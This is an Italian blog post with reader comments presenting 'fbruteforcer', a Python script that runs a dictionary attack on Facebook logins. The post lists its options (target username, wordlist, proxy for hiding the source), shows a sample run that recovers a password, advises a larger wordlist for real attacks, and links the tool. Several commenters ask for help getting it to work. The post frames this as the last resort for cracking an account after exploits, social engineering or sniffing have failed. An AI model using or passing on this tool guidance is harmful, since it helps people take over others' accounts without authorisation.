Craccare Facebook con fbruteforcer

Se non si riesce a craccare un account di Facebook sfruttando un bug, attuando qualche trucco di social-engineering o sniffando la passdword in una rete locale, non rimane che un’ultima carta da giocare: la cara vecchia forza bruta.

Dallo stesso autore di wpbruteforcer, script per recuperare la password di un account WordPress tramite dictionary-attack, eccovi oggi un script, sempre scritto in python, per attaccare un account Facebook.

Per i dettagli sull’installazione (anche questo script utilizza il modulo mechanize) vi rimando all’altro articolo.

I parametri obbligatori di questo script sono:

-u utente da attaccare (va bene anche l’indirizzo email)
-w nome del file contenente il dizionario

Inoltre è possibile utilizzare un proxy:

-p specifica l’indirizzo (e la porta) del proxy nel formato indirizzo:porta
-k eventuale nome utente del proxy
-i eventuale password per accedere al proxy

Ecco l’attacco (finto) al mio account, eseguito da Windows. Ho usato un dizionario di quattro parole (in uno scenario reale conviene usarne uno un po’ più corposo…):

C:\PH>fbrutecorcer.py -u angelorighi  -w dictionary.txt
 
Programmer : gunslinger_
Version       : 1.0
 
[*] Starting attack at 23:39:32
[*] Account for bruteforcing angelorighi
[*] Loaded : 4 words
[*] Bruteforcing, please wait...
[*] Trying letmein...

password trovata al terzo tentativo.

[*] Logging in success...
[*] Username : angelorighi
[*] Password : letmein

Tutto facile quindi? Naturalmente no. Se però avete il dubbio che la vostra password possa facilmente essere inserita in un dizionario di parole comuni correte a cambiarla.

Lo script lo potete trovare qui

10 Commenti

  1. io per scrupolo l’ho provato ma, si blocca dopo un pò e mi segnala questo errore

    [*] Trying aakkosillansa$\… Traceback (most recent call las t):
    File “fbruteforcer.py”, line 243, in
    main()
    File “fbruteforcer.py”, line 237, in main
    releaser()
    File “fbruteforcer.py”, line 175, in releaser
    bruteforce(word.replace(“\n”,””))
    File “fbruteforcer.py”, line 148, in bruteforce
    br.submit()
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 541, in submit
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 203, in open
    File “build/bdist.linux-i686/egg/mechanize/_mechanize.py”, line 255, in _mech_ open
    mechanize._response.httperror_seek_wrapper: HTTP Error 500: Internal Server Erro

  2. Devi sistemare il file py
    in python il codice deve essere allineato
    correggi le linee che ti dice e vedi che va

    a me funziona

    ma non ho ben chiaro dove appare la password giusta

  3. Ma FB non ha un numero massimo di tentativi possibili? Inoltre accedendo da un proxy, questo potrebbe essere riconosciuto come una postazione “insolita” (mi è capitato utilizzando una rete vpn svizzera) e facebook passa a bloccare l’accesso richiedendo dati secondo loro personali, tipo la data di compleanno 😛 (ridicolo)
    Ultimamente un mio amico ha avuto esperienza di un sistema di controllo più raffinato, gli veniva chiesto di riconoscere le persone presenti in una foto (erano state taggate ovviamente) e di immetere il loro nome. Nel suo caso però si trattava di un account promozionale di un’associazione. Su 2000 amici ne conosceva si e no un 100naio, gli altri erano appunto simpatizzanti dell’associazione sparsi per l’Italia. Per cui le foto degli amici erano foto di persone che non conosceva, ergo è rimasto fuori 😀 (gliel’avevo detto di fare una fan page invece che un profilo!)

  4. francesco, al primo tentativo però ha funzionato con un vocabolario di sole 4 parole tra cui la mia pass.
    Io ho subito pensato a quello che ha detto Enrico che c’è il numero massimo di tentativi, però se così fosse il brute force cesserebbe di esistere perché ormai dappertutto c’è il numero massimo di tentativi

  5. Ciao a tutti, anke io ero interessato a questo script, però girovagando per il web non ho ben chiare alcune cose: 1) come si istalla il modulo mechanize una volta istallato python 2) come và inserita la sintassi visto che mi dà sempre errore (copiandola semplicemente) e 3) dove si devono trovare il file .py e il .txt del dizionario? Grazie a chiunque sappia illuminarmi 🙂

  6. Scusa, ho provato con il mio account inserendo nel txt la password insieme ad altre inventate a caso. Però mi dà errore “syntax” mi spieghi il motivo? Ho provato la versione 3.x e 2.7. Ho installato la versione 0.2.4 di mechanize dal setup, e non cambia niente.

I commenti sono bloccati.